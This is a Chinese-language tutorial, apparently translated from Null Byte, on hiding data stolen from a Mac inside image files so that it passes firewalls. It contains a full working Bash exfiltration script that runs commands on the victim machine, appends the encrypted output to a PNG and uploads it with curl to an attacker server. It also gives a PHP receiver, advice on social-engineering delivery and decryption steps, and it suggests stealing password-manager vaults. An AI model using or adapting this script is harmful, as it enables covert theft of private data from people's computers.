如何利用图片绕过防火墙窃取数据? - iYouPort
如何利用图片绕过防火墙窃取数据?
- 一种绕过防火墙的攻击方法
无需使用元数据工具即可将数据快速注入图像中。
攻击者可能会将这些图片发送到普通的文件共享网站,从而借此从 MacBook 中窃取敏感信息。
本文探讨的就是一种将数据嵌入图像的替代方法。
与使用元数据标签将有效载荷存储在图像内部的方法不同,这里探讨的方法涉及将文本直接注入图像文件的页脚中。以下是 null-byte 的演示。
了解攻击
为本文创建了一个简单的Bash脚本,以演示攻击者如何轻松地在目标Mac计算机上找到的图像中渗入数据。
该脚本在下面, GitHub 在这里 。
#!/bin/bash
# `if` statement to detemine if the message is a 'response' one
# This is the command being executed and embedded in the photo.
# Single-quotes are used here to help with escaping special
# characters within the desired command(s).
exfilData='ls -lah "/Users/$USER/"'
# Where the attackers PHP server is located. This needs to be
# updated to use a public domain, like Dropbox or something
# with an official API.
exfilSite="http://attacker.com/index.php"
# If no suitable image is found on the target computer, this
# image will be downloaded and used instead. By default, the
# script tries to use an image already on the MacBook to
# minimize the amount of traffic originating the device.
tmpImage="https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"
# The `find` command used to locate a suitable image to embed
# data into. It will check the users home (~) directory for the
# first (-print -quit) JPG, JPEG, or PNG smaller than 100k.
# The filesize maximum and filetypes are somewhat arbitrary.
# The size can be increased and the filetypes can be expanded
# to use MP3, PDF, and MOV files, for example.
findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"
# If the encryption option is enabled, the password is hardcoded
# into the payload for convenience, making it possible to
# reverse engineer and decrypt the exfiltrated data inside the
# image. This is a quick and dirty solution.
pass="password123"
# An `if` statement to detect if a suitable PNG or JPG was
# discovered. If not, it will download the backup image
# defined earlier in the script (tmpImage).
if [[ ! -f "$findImage" ]]; then
# Curl will silently (-s) download the backup image and
# save it (-o) into the /tmp directory with the i.jpg filename.
curl -s "$tmpImage" -o "/tmp/i.jpg"
# The backup image is set into the exfilImage variable for
# later commands.
exfilImage="/tmp/i.jpg"
else
# If a suitable image is discovered, the exfilImage variable
# is set for later commands.
exfilImage="$findImage"
fi
# It may or may not be desirable to encrypt the payload output
# before embedding it into the image. Set to `1` to enable
# encryption, set to `0` to disable it.
useEncrypt='1'
# An `if` statement to determine the value of the exfilType
# variable. If `1` it will encrypt with openssl (LibreSSL).
# Otherwise, it will not encrypt.
if [[ "$useEncrypt" = '1' ]]; then
# OpenSSL is used to encrypt (enc) the payload output
# as well as encode (-a -A) the encrypted data with a
# password (-pass).
exfilData="$(openssl enc -aes-256-cbc -a -A -in <(eval $exfilData) -pass pass:$pass)"
else
# If encryption isn't used, Bash will evaluable the variable
# and execute it as a command.
exfilData="$(eval $exfilData)"
fi
# Printf is used to embed the command output directly into
# image. It will append (>>) the data on a newline (\n\n).
# The newlines make it easy to quickly extract the data
# after it has been delivered to the attacker.
printf '\n\n%s' "$exfilData" >> "$exfilImage"
# Curl will exfiltrate the image to the attackers PHP
# server.
curl -F "[email protected]$exfilImage" "$exfilSite"
该脚本将首先执行任意命令(例如 system_profiler)。该命令的输出是攻击者希望窃取的数据。
然后,脚本将尝试在目标的主目录(〜/)中定位 JPEG 或 PNG 图像,并将命令的输出直接注入图片中。接着将图像立即上传(走私数据)到攻击者想要的任何网站。
以下是使用 Kali 中的 nano 文本编辑器打开的小图像文件的示例。可以看到图像产生了一些不寻常的字符,因为照片并不是要用文本编辑器打开的。
�PNG
^Z
^@^@^@
IHDR^@^@^D�^@^@^A^@^H^F^@^@^@�^Ebk^@^@^L^WiCCPICC Profile^@^@H��W^GXS�^V�[� %�J �A4�&%�H��FH^B %�^T^T�
Wp-��`Y�U^Q^E�^B�Z�`a��-���ł
�7 ���}����o2?���?3瞹�^L^@�j�T��j^CP Q�^R^cXi�^Y,R^[email protected]^A^E��(`��˥���(^@������5����N*��|�_��@(�^C��A�%��^K �^K^@6�/�)^@ �A��T�T�� f$
��_c��N^U�"^RT#�ۍ��H^Uր��$+&v��B,P�U��"eD2�t^@P�/^O�^Xƺ^B^H�^P^GeI�cT��^Nb�lq^XwH^GM^P+�I_�Byh"İr�I�^d�X�$[^V�^Y���d��L�˔yɜa��"!W�O�xG$
ł^[email protected]��DS^\`w����t':��B7�6`�X'v^Pk^AAPa(/y0^[���B��gw�7����7^C�^PNS��+�PZ,^S��^T,^N�� Y\ ^?�(�^K��^[^@�7th���W^?^[^Q���6^E�k�?�$
f���^T���`^U�^A^[�&�
�^D�A^K8^@����,�^@��۠^K��g�^OV�^@� $��0^P#�^\�F^\^Q^W�^K�GB�($^AIG2�^\D�(�^Y�|�^\�@j��H=�^K�^_9��F."7�n� �
��b(^Ue���
向下滚动到同一文件的最底部,会发现一些 ls 和 system_profiler 命令的输出。
�^D^^�'�?^?~���P��"�f��"c�5h^@w衇F�^K��x2VS�L�P$]^D����{h�����uL^f��ia������0pݺuqg^Ha�Gg��@�G�^^����<9f^W����^O?�kH��"UC��<������f^?]^N^X0 d�"g^WZ�ǽt���?���twu�G|.��yM~�k7�C^N9$e�������?nܸ^Bg^WL���^P�^L^S��7�IW�^F�V��{�^]w�ʸ~�+W��ˤ^F��N;�����ɐW��ץ�Vg^_-,,^L�l��2�~�v����P.b�$
�Xr�^U^U^U��D���l�^Z�J^W��T����<�^D�a����g�c˝s�9[$�s�~��i(;gΜ�L(���^[kL�)o6m:���ܶ'��u�~��%G^\q�]��mk��իW�F�^^�E�kM^O^Z��[�����^Z���d�f6J��
�4a3^B^H �^@^B^H �^@^B^H ��v" èU��^E-�Z). ��'�#I�X��jZ']F�^?�����^?����+���ꩧ��+��'T0ǹ��^[k$��|���^[������v
^��m�^V�i;�v��'n�9sf��Ǯ\�m�����⋷�^Ep�=۵�6�Kڥ\�s���Ž�^_���������֦f����qL;9N���B{� 'l^�dI�>Gsު����1�0f̘JS�g�a�8�Z}��V'ݐv��6�����^Epz�O>�$1y������'��:��TbV9���������t�\
�uVd����Pf�MH^X\{�q�m�e^@��*x�^@^B^H �^@^B^H �^@^B^H �@�^E���3���)��sϐt1^L�,����j��EK�5��^{��K�^N�.�I�����<^]+^Z�^F�^[��'�3yJ^ELB�!n�@�^N��F���^\\F�8Dqq�5+�tU^Nj7aG&^W���:��s]���g�]k�xA�^UW��Jp��y���X^&�h� ����\*���t�^F��~����k�{�-��[email protected]/��m� J��g�'^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]��^$
�B �{.��^P.��^\^K^A^D^[email protected]^@^A^D^[email protected]^@^A^D^P��^EZ^S�ك�o�^L�^A^B^Ht^F�^G^^x�N�:ýr�^H �^@^B^H �^@^B^H �^@^B;�@�c��8�ʝ �^@^B^H �^@^B^H �^@^B^H �^@^B^H �>^B�p���Y^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D:�^@!\'z��*^B^H �^@^B^H �^@^B^H �^@^B^H �@�^H^Pµ�;gE^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^$
�#�^@^B^H �^@^B^H �^@^B^H �^@^B^H �Q����
���g�@�nݬ�֯_^_X�[email protected]�E"^Q�H�p6^Eo^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^P�&��oZ�6dȐ���{����^e^K��8���^Wc�ys�^U^B^H �^@^B^H �^@^B^H �^@^B^H �^@^B��vA�ӧOJ^@g6j^E�n�6�E^Hg$X"�^@^B^H �^@^B^H �^@^B^H �^@^B^H �[email protected]+���-�K���q��
!\6)�#�^@^B^H �^@^B^H �^@^B^H �^@^B^H �E �L�V����UUۘ^W!��`�^@^B^H �^@^B^H �^@^B^H �^@^B^H �@^[ ^Pµ^Q,�E^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]�^H^P�^Y �^H �^@^B^H �^@^B^H �^@^B^H �^@^B^H��^@!\^[�rX^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D�^@!��`�^@^B^H �^@^B^H �^@^B^H �^@^B^$
�b���1/^S�m[c��D^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^AW�P(^Tذa��6]�~����1/
��J*^W6+X"�^@^B^H �^@^B^H �^@^B^H �^@^B^H �@�^B�p8�r�J�j8���m�F_�dr��p���PW�B^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@��^E��Mö�^K^W^F֮]^[������u�n3�pR^@7/�H$f����*�� ���S�^B^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D��h ^^�^G�/_^^x��w,^P
^BN�9^3B����뺣$���_B�'^]�x�^@^B^H �^@^B^H �^@^B^H �^@^B^H �@�^W� {Qmmj
�^T�Y�[$^R ��^Fp�μ�+��s�̙�^]S�^_^?��u=z�X!
F��C寻i�^R^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^D^[email protected]^@^A^DZ$�V·yR��Ϲs�>*{&�^[email protected]��q�2��^@^@^@^@IEND�B`�
total 80
drwx------+ 19 user staff 608B May 3 02:22 Desktop
drwxr-xr-x+ 17 user staff 544B May 3 01:00 .
-rw------- 1 user staff 55B May 3 01:00 .lesshst
drwx------ 59 user staff 1.8K May 2 23:48 .bash_sessions
-rw------- 1 user staff 23K May 2 22:17 .bash_history
[email protected] 1 user staff 8.0K May 2 22:11 .DS_Store
drwx------ 7 user staff 224B Apr 28 06:46 .Trash
drwx------+ 33 user staff 1.0K Apr 26 21:33 Documents
[email protected] 55 user staff 1.7K Apr 25 06:58 Library
drwxr-xr-x 15 user staff 480B Nov 18 11:36 .atom
drwx------+ 4 user staff 128B Nov 18 06:32 Downloads
drwx------ 3 user staff 96B Nov 18 05:51 .config
drwx------+ 3 user staff 96B Oct 29 2018 Movies
drwx------+ 3 user staff 96B Oct 29 2018 Music
drwx------+ 3 user staff 96B Oct 29 2018 Pictures
drwxr-xr-x+ 4 user staff 128B Oct 29 2018 Public
drwxr-xr-x 5 root admin 160B Oct 29 2018 ..
Firewall:
Firewall Settings:
Mode: Allow all incoming connections
Firewall Logging: Yes
Stealth Mode: No
图像如何保留数据的技术细节超出了本文的范围。这里重要的是,图片底部的数据不会让照片看起来有任何不同。
诸如 Apple 的 Preview 之类的图像查看器将继续如常打开图像,而 不会检测到图像文件中隐藏的数据 。
这样,就把图像变成了用于数据窃取的出色传输机制。
该脚本使用 I/O 重定向完成将数据注入到图像文件中的过程。这与使用 >> 运算符将数据附加到文本文件的方式非常相似,该脚本会将命令输出附加到图像文件的底部。
为什么要在图像中渗入数据?
因为这样做可以绕过防火墙。借助 基于网络的防火墙 解决方案,可以观察到在网络上特定设备传输的每个数据包。于是攻击者很难获取大量信息。
而在图像中走私数据有助于解决这一障碍。
了解有效载荷
现在逐行分解一下 这个脚本 。
它从几个变量开始,应根据情况进行适当更改。第一个变量将确定要在目标MacBook上执行的命令。该命令的输出嵌入在图像文件中。
下面的示例对目标的主目录执行一个简单的 ls 命令。单引号用于此变量,以帮助转义字符。在提出要执行的命令时要注意这一点。
exfilData='ls -lah "/Users/$USER/"'
该图像可以泄露到很多地方。在 Dropbox 和 Flickr 等网站上,存在官方 API,以使最终用户(包括攻击者)尽可能方便地上传文件。
同样,curl 可以模拟POST请求,将图像发送到文件共享网站和其他论坛。对于此演示,我们将在攻击者的系统上使用简单的PHP服务器设置。
exfilSite="http://attacker.com/index.php"
就像稍后在脚本中看到的那样,它尝试枚举可行的图像以将输出数据保存到其中。如果未找到任何东西,脚本将下载下面的图像,使用它来走私输出数据。
以下 URL 链接到一个 Apple 域的随机图像,但实际上可以是互联网上的任何 JPEG 或 PNG。
tmpImage="https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"
该脚本将尝试查找小于100k且包含 JPEG、JPG 或 PNG 文件扩展名的图像文件 ( -type f )。
它将使用符合此条件的第一个图像作为渗透文件 ( -print -quit )。
文件大小基本任意的。较小的图像文件将使上传过程更快。这些 find 的主要功能是显示如何完善条件。
findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"
该脚本支持在将命令输出数据嵌入到图像之前对其进行加密的功能。用 1 启用它,用 0 禁用它。
useEncrypt='1'
启用加密后,以下密码用于保护输出数据。为了方便起见,它被硬编码到有效负载中,这使得可以反向工程和解密图像中的渗入数据。公钥加密在这里更有意义。
pass="password123"
脚本的其余部分无需修改。以上所有变量均硬编码到以下部分中。
以下是两个 if 语句中的第一个,它将确定是否检测到合适的 JPEG 或 PNG 文件,然后在以下命令中使用它,或下载在 “tmpImage” 变量中定义的 Apple 图像。
if [[ ! -f "$findImage" ]]; then
curl -s "$tmpImage" -o "/tmp/i.jpg"
exfilImage="/tmp/i.jpg"
else
exfilImage="$findImage"
fi
第二个 if 语句使用 OpenSSL(在 macOS 或 Mac OS X 中为 LibreSSL )用 $pass 来加密输出数据。否则,它将不会加密并将输出数据以纯文本格式注入到图像中。
if [[ "$useEncrypt" = '1' ]]; then
exfilData="$(openssl enc -aes-256-cbc -a -A -in <(eval $exfilData) -pass pass:$pass)"
else
exfilData="$(eval $exfilData)"
fi
这里有 I/O 重定向。Printf 用于将命令输出附加( >> )到图像文件中。添加了换行符( \n\n )以将注入的数据与原始图像数据分开,从而使在以下命令中更易于提取。
printf '\n\n%s' "$exfilData" >> "$exfilImage"
最后,发送图像。
curl -F "[email protected]$exfilImage" "$exfilSite"
第一步:启动PHP服务器
本文前面使用的示例利用 File.io 存储被渗透的图像。尽管类似的文件共享网站都非常适合此攻击,但这里将展示如何在 Kali 中使用本地 PHP 服务器来拦截图像。
PHP 用于拦截来自目标 MacBook 的图像。将以下 PHP 代码保存到名为 “ index.php” 的文件中,并使用 php -S 0.0.0.0:80 启动服务器。
<?php
$file = date("dHis") . ".png";
move_uploaded_file($_FILES['image']['tmp_name'], $file);
?>
第二步:部署有效载荷
有几种方法可以使 Mac 用户执行某些恶意代码。
破坏目标的最简单方法是对其进行社交工程设计,以诱使目标打开木马化的 AppleScripts。
这可以通过执行 USB Dead Drop 攻击来实现,macOS 极易受到该攻击或远程绕过Gatekeeper攻击。
有关 USB Dead Drop 攻击的更多信息,可以看 这篇文章 。它着重于损害Windows 10目标,但也深入讨论了如何使用USB闪存驱动器作为攻击媒介。
第三步:访问被窃取的数据
PHP 服务器接收到被渗透的图像后开始提取嵌入的数据。如果在有效负载中禁用了加密,则可以使用 tail 命令轻松提取里面所有数据。根据需要更改要打印的行数( -n )。
~$ tail -n 20 image.png
1 ���g�@�nݬ�֯_X�[email protected]�E"�H�[email protected]@@@�&��oZ�6dȐ���{����
��J*6+X" �@��p8�r�J�j8���m�F_�dr��p��PW�[email protected]@@@����Mö� ��!\[email protected]@@@�!��` �@ ,�[email protected]@@@� ��!\[email protected]@@@�!��` �@ ,�[email protected]@@�q��`���1�
F��C寻i�@@@@Z$�V·yR��Ϲs�>*{&�@��q�2��IEND�B`� ]����u�n3�pR7/�H$f���*�� ���S�@@@@��h ��/_x�w,
2 total 80
3 drwx------+ 19 user staff 608B May 3 02:22 Desktop
4 drwxr-xr-x+ 17 user staff 544B May 3 01:00 .
5 -rw------- 1 user staff 55B May 3 01:00 .lesshst
6 drwx------ 59 user staff 1.8K May 2 23:48 .bash_sessions
7 -rw------- 1 user staff 23K May 2 22:17 .bash_history
8 [email protected] 1 user staff 8.0K May 2 22:11 .DS_Store
9 drwx------ 7 user staff 224B Apr 28 06:46 .Trash
10 drwx------+ 33 user staff 1.0K Apr 26 21:33 Documents
11 [email protected] 55 user staff 1.7K Apr 25 06:58 Library
12 drwxr-xr-x 15 user staff 480B Nov 18 11:36 .atom
13 drwx------+ 4 user staff 128B Nov 18 06:32 Downloads
14 drwx------ 3 user staff 96B Nov 18 05:51 .config
15 drwx------+ 3 user staff 96B Oct 29 2018 Movies
16 drwx------+ 3 user staff 96B Oct 29 2018 Music
17 drwx------+ 3 user staff 96B Oct 29 2018 Pictures
18 drwxr-xr-x+ 4 user staff 128B Oct 29 2018 Public
19 drwxr-xr-x 5 root admin 160B Oct 29 2018 ..
如果启用了加密,则必须在 Kali 中安装 OpenSSL(LibreSSL)才能解密数据。确保安装 LibreSSL 版本2.8 。在本测试中 2.9.x 版本似乎与 Mojave 的 LibreSSL 版本不兼容;数据不会解密。
在 Kali 中,首先下载 LibreSSL 压缩包。
~$ wget 'https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.2.tar.gz'
--2019-04-28 21:08:46-- https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.2.tar.gz
Resolving ftp.openbsd.org (ftp.openbsd.org)... 129.128.5.191
Connecting to ftp.openbsd.org (ftp.openbsd.org)|129.128.5.191|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3373599 (3.2M) [text/plain]
Saving to: ‘libressl-2.8.2.tar.gz’
libressl-2.8.2.tar.gz 100%[==============>] 3.22M 255KB/s in 25s
2019-04-28 21:09:15 (133 KB/s) - ‘libressl-2.8.2.tar.gz’ saved [3373599/3373599]
使用以下 tar 命令将其解压缩,以提取 ( x ) .gz ( z ) 文件( f ).
~$ tar -xzf libressl-*.tar.gz
libressl-2.8.2/m4/check-hardening-options.m4
libressl-2.8.2/m4/check-libc.m4
libressl-2.8.2/m4/check-os-options.m4
libressl-2.8.2/m4/disable-compiler-warnings.m4
libressl-2.8.2/m4/libtool.m4
...
libressl-2.8.2/man/tls_load_file.3
libressl-2.8.2/man/tls_ocsp_process_response.3
libressl-2.8.2/man/tls_read.3
libressl-2.8.2/man/openssl.cnf.5
libressl-2.8.2/man/x509v3.cnf.5
libressl-2.8.2/man/Makefile.in
libressl-2.8.2/man/CMakeLists.txt
完成后,将 ( cd ) 更改为新的 libressl-* / 目录。
~$ cd libressl-*/
使用 ./configure 确保一切准备就绪,可以构建应用。这将需要几分钟才能完成。
~$ ./configure && make
checking build system type... x86_64-pc-linux-gnu
checking host system type... x86_64-pc-linux-gnu
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for a thread-safe mkdir -p... /usr/bin/mkdir -p
...
make[1]: Entering directory '/opt/libressl-2.8.2/man'
make[1]: Nothing to be done for 'all'.
make[1]: Leaving directory '/opt/libressl-2.8.2/man'
make[1]: Entering directory '/opt/libressl-2.8.2'
make[1]: Nothing to be done for 'all-am'.
make[1]: Leaving directory '/opt/libressl-2.8.2'
然后,使用 make install 将必要的软件安装到适当的系统目录中。
~$ make install
make install
Making install in crypto
make[1]: Entering directory '/opt/libressl-2.8.2/crypto'
make install-am
make[2]: Entering directory '/opt/libressl-2.8.2/crypto'
...
make[2]: Nothing to be done for 'install-exec-am'.
/usr/bin/mkdir -p '/usr/local/lib/pkgconfig'
/usr/bin/install -c -m 644 libcrypto.pc libssl.pc libtls.pc openssl.pc '/usr/local/lib/pkgconfig'
make[2]: Leaving directory '/opt/libressl-2.8.2'
make[1]: Leaving directory '/opt/libressl-2.8.2'
最后,使用 ldconfig 创建必要的链接并缓存到最新的共享库。
~$ ldconfig
要验证安装是否成功,请使用 whereis 命令查找 openssl 二进制文件。
~$ whereis openssl
openssl: /usr/bin/openssl /usr/local/bin/openssl /usr/share/man/man1/openssl.1ssl.gz
/usr/local/bin/ 中的文件是最新版本,可以使用以下 openssl 命令进行验证。
~$ /usr/local/bin/openssl version
LibreSSL 2.8.2
完成安装后,可使用以下命令提取并解密图像中的数据。
~$ /usr/local/bin/openssl enc -d -aes-256-cbc -a -A -pass pass:password123 -in <(tail -n1 image.png)
total 80
drwx------+ 19 user staff 608B May 3 02:22 Desktop
drwxr-xr-x+ 17 user staff 544B May 3 01:00 .
-rw------- 1 user staff 55B May 3 01:00 .lesshst
drwx------ 59 user staff 1.8K May 2 23:48 .bash_sessions
-rw------- 1 user staff 23K May 2 22:17 .bash_history
[email protected] 1 user staff 8.0K May 2 22:11 .DS_Store
drwx------ 7 user staff 224B Apr 28 06:46 .Trash
drwx------+ 33 user staff 1.0K Apr 26 21:33 Documents
[email protected] 55 user staff 1.7K Apr 25 06:58 Library
drwxr-xr-x 15 user staff 480B Nov 18 11:36 .atom
drwx------+ 4 user staff 128B Nov 18 06:32 Downloads
drwx------ 3 user staff 96B Nov 18 05:51 .config
drwx------+ 3 user staff 96B Oct 29 2018 Movies
drwx------+ 3 user staff 96B Oct 29 2018 Music
drwx------+ 3 user staff 96B Oct 29 2018 Pictures
drwxr-xr-x+ 4 user staff 128B Oct 29 2018 Public
drwxr-xr-x 5 root admin 160B Oct 29 2018 ..
本文中使用的有效负载是一个基本示例。但是在实际情况下,攻击者有可能会设计脚本为离线暴力攻击者定位并泄露 LastPass 和 1Passwords 数据。
其他渗透攻击可能涉及缓存的浏览器密码、终端历史记录、Web流量,以及攻击者认为值得窃取的任何数据。⚪️
文章版权归原作者所有。